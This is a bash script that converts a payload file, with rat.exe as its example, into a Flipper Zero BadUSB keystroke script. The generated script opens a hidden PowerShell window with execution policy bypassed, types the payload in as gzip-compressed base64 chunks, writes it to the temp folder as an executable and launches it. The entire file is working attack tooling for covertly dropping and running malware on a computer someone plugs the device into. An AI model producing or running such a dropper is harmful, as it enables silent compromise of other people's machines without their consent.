#!/usr/bin/env bash
# gen_badusb.sh - generate a Flipper BadUSB script from a payload file
# Usage: ./gen_badusb.sh <payload> [chunk_size]
# Example: ./gen_badusb.sh rat.exe 200 > ~/flipper/badusb/output.txt

set -euo pipefail

PAYLOAD="${1:-}"
CHUNK_SIZE="${2:-200}"

if [ -z "$PAYLOAD" ] || [ ! -f "$PAYLOAD" ]; then
    echo "Usage: $0 <payload_file> [chunk_size]" >&2
    exit 1
fi

B64=$(gzip -9 -c "$PAYLOAD" | base64 -w 0)
TOTAL=${#B64}
OUTFILE="${PAYLOAD##*/}"
OUTFILE="${OUTFILE%.*}"
RAW_SIZE=$(wc -c < "$PAYLOAD")

cat <<HEADER
REM Generated by gen_badusb.sh — payload: $(basename "$PAYLOAD") (${RAW_SIZE} bytes → ${TOTAL} base64 chars after gzip)
DELAY 2000
GUI r
DELAY 800
STRING powershell -ep bypass -w hidden
ENTER
DELAY 1000
STRING \$d = ""
ENTER
HEADER

offset=0
while [ $offset -lt $TOTAL ]; do
    chunk="${B64:$offset:$CHUNK_SIZE}"
    echo "STRING \$d += \"$chunk\""
    echo "ENTER"
    offset=$((offset + CHUNK_SIZE))
done

cat <<FOOTER
STRING \$b = [Convert]::FromBase64String(\$d); \$ms = New-Object IO.MemoryStream(,\$b); \$gz = New-Object IO.Compression.GZipStream(\$ms, [IO.Compression.CompressionMode]::Decompress); \$out = New-Object IO.MemoryStream; \$gz.CopyTo(\$out); \$f = "\$env:TEMP\\${OUTFILE}.exe"; [IO.File]::WriteAllBytes(\$f, \$out.ToArray()); Start-Process \$f
ENTER
FOOTER
